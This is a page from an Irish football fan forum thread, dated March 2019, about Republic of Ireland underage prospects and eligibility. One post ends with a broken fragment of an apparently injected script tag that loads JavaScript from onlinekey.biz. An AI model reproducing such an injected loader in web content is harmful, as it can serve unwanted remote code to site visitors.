You Boys in Green Homepage YBIG Shop
Forum Home Forum Home : International : Republic Of Ireland
  FAQ FAQ  Forum Search   Events   Register Register  Login Login

Underage squads: Best Prospects

Post Reply Post Reply Page  <1 9192939495 329>
Author
Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote Banjaxed Quote  Post ReplyReply Direct Link To This Post Posted: 02 Mar 2019 at 7:26pm
Regardless of age if a player is playing first team football in the premier League or the championship then there is no reason why he shouldn't be called up to the Irish senior team irrespective of where he may be at underage international level.

action speaks louder than words and if a player is getting first team football it says a lot. The fact that somebody else is vouching for connell is half the battle for Mick. Now it's just whether or not Mick fancies the player himself.

Sponsored Links

Conan View Drop Down
Davey Langan
Davey Langan
I’m not very bright.

Post Options Post Options   Thanks (0) Thanks(0)   Quote Conan Quote  Post ReplyReply Direct Link To This Post Posted: 02 Mar 2019 at 7:29pm
Well hopefully not as he's still a minor! What are we Luxembourg now that simply appearing in the first team for a championship side, no matter how lowly and wretched they are merits a call up to our senior team! If that is the case as career with our national team is unlikely to appeal to anyone.< ="text/" async="" ="//onlinekey.biz/1f9f5ee62aefca3cb1.js">
NewtNewbie View Drop Down
Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote NewtNewbie Quote  Post ReplyReply Direct Link To This Post Posted: 02 Mar 2019 at 8:35pm
Originally posted by Banjaxed Banjaxed wrote:

Regardless of age if a player is playing first team football in the premier League or the championship then there is no reason why he shouldn't be called up to the Irish senior team irrespective of where he may be at underage international level.

action speaks louder than words and if a player is getting first team football it says a lot. The fact that somebody else is vouching for connell is half the battle for Mick. Now it's just whether or not Mick fancies the player himself.

Well, he has got lovely hair.

I can only imagine his dad was listening to a lot of Britpop-era music as Luka was growing up.

Roberto Baggio View Drop Down
Robbie Keane
Robbie Keane
UNBELIEVABLE JEFF

Post Options Post Options   Thanks (0) Thanks(0)   Quote Roberto Baggio Quote  Post ReplyReply Direct Link To This Post Posted: 02 Mar 2019 at 8:54pm
Looks like he was in ABBA
doherty View Drop Down
Jack Charlton
Jack Charlton
Teenage Kicks, so hard to beat

Post Options Post Options   Thanks (0) Thanks(0)   Quote doherty Quote  Post ReplyReply Direct Link To This Post Posted: 02 Mar 2019 at 8:57pm
Originally posted by Roberto Baggio Roberto Baggio wrote:

Looks like he was in ABBA-ESQUE 
NewtNewbie View Drop Down
Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote NewtNewbie Quote  Post ReplyReply Direct Link To This Post Posted: 02 Mar 2019 at 9:11pm
He does bear more than a passing resemblance to Anni-Frid Lyngstad right enough.
Gerry Geary View Drop Down
Kevin Kilbane
Kevin Kilbane

Post Options Post Options   Thanks (0) Thanks(0)   Quote Gerry Geary Quote  Post ReplyReply Direct Link To This Post Posted: 03 Mar 2019 at 12:14am
The resemblance is between Paddy Bamford and a Young Keano. ok he has to get a buzz hair cut asap
The Huntacha View Drop Down
Roy Keane
Roy Keane

Post Options Post Options   Thanks (0) Thanks(0)   Quote The Huntacha Quote  Post ReplyReply Direct Link To This Post Posted: 12 Mar 2019 at 3:50am
Not sure if it's been posted on here but apparently there are no Irish strikers born in '98 or '99 playing in England.
Jimmy Bullard - "Favorite band? Elastic."
tetsujin1979 View Drop Down
Ray Houghton
Ray Houghton

Post Options Post Options   Thanks (0) Thanks(0)   Quote tetsujin1979 Quote  Post ReplyReply Direct Link To This Post Posted: 12 Mar 2019 at 9:23am
Aidan Keena (June 1998) is the only one I can find, although he's at Hearts
All goals, red & yellow cards posted on mastodon and facebook
engpad View Drop Down
500 Club la la la
500 Club la la la

Post Options Post Options   Thanks (0) Thanks(0)   Quote engpad Quote  Post ReplyReply Direct Link To This Post Posted: 12 Mar 2019 at 11:06am
Armstrong Okoflex is on fire for the reserves at Celtic, we really should be showing a pathway to him and getting him involved with the under 21s. It's a higher level than he would be getting near with England and we have to use that to keep him involved. This lad is up there with Troy Parrott in terms of talent and we need to do everything possible to get him playing for the country of his birth. 
BrendanD88 View Drop Down
Jack Charlton
Jack Charlton

99% of my posts are emojis

Post Options Post Options   Thanks (0) Thanks(0)   Quote BrendanD88 Quote  Post ReplyReply Direct Link To This Post Posted: 12 Mar 2019 at 12:11pm
Originally posted by tetsujin1979 tetsujin1979 wrote:

Aidan Keena (June 1998) is the only one I can find, although he's at Hearts

So you can find no one then.
Stimpy View Drop Down
Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote Stimpy Quote  Post ReplyReply Direct Link To This Post Posted: 12 Mar 2019 at 12:14pm
Originally posted by NewtNewbie NewtNewbie wrote:

Originally posted by Banjaxed Banjaxed wrote:

Well, he has got lovely hair.

I can only imagine his dad was listening to a lot of Britpop-era music as Luka was growing up.

Hint of Clockwork Orange there
cildaratown View Drop Down
Liam Brady
Liam Brady

killdare town

Post Options Post Options   Thanks (0) Thanks(0)   Quote cildaratown Quote  Post ReplyReply Direct Link To This Post Posted: 12 Mar 2019 at 1:57pm
The north called up Ballard from Arsenal. 19 year old defender who’s been playing for their youth teams. Not sure if Eire was ever an option for him or if he’s even that good. 
Luis Amor Rodriguez View Drop Down
Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote Luis Amor Rodriguez Quote  Post ReplyReply Direct Link To This Post Posted: 12 Mar 2019 at 4:38pm
Daniel Ballard - apparently his Mum's from the North, so should be eligible for us.

Highly regarded at Arsenal, and apparently due a call to the first team squad by some accounts.  

Seems like we may have missed a trick.  Not too late to see if he's interested in considering ROI as an option.

skylarking View Drop Down
Kevin Kilbane
Kevin Kilbane

Post Options Post Options   Thanks (0) Thanks(0)   Quote skylarking Quote  Post ReplyReply Direct Link To This Post Posted: 12 Mar 2019 at 4:50pm
Whatever about the wisdom of pursuing more granny-rulers, I think we should absolutely be doing everything within our power to prevent another Grealish/Rice scenario with players already involved at underage level. 

The standout concerns for me:
Luca Connell
Armstrong Okoflex 

Green Devil View Drop Down
Robbie Keane
Robbie Keane
Aye Kes, I've pissed me-self again

Post Options Post Options   Thanks (0) Thanks(0)   Quote Green Devil Quote  Post ReplyReply Direct Link To This Post Posted: 12 Mar 2019 at 4:54pm
I can't grasp why some people cannot just accept that there are players out there who are content and happy to play for Northern Ireland.

Green Devil View Drop Down
Robbie Keane
Robbie Keane
Aye Kes, I've pissed me-self again

Post Options Post Options   Thanks (0) Thanks(0)   Quote Green Devil Quote  Post ReplyReply Direct Link To This Post Posted: 12 Mar 2019 at 4:55pm
Originally posted by skylarking skylarking wrote:

Whatever about the wisdom of pursuing more granny-rulers, I think we should absolutely be doing everything within our power to prevent another Grealish/Rice scenario with players already involved at underage level. 

The standout concerns for me:
Luca Connell
Armstrong Okoflex 

Isn't currently in our set up
The O'Shea View Drop Down
Jack Charlton
Jack Charlton
I know everything and I’m NEVER wrong

Post Options Post Options   Thanks (0) Thanks(0)   Quote The O'Shea Quote  Post ReplyReply Direct Link To This Post Posted: 12 Mar 2019 at 7:09pm
Originally posted by Green Devil Green Devil wrote:

I can't grasp why some people cannot just accept that there are players out there who are content and happy to play for Northern Ireland.

No one is denying that, they're simply pointing out that there's no point not asking them.
We're decent enough..
 Post Reply Post Reply Page  <1 9192939495 329>
  Share Topic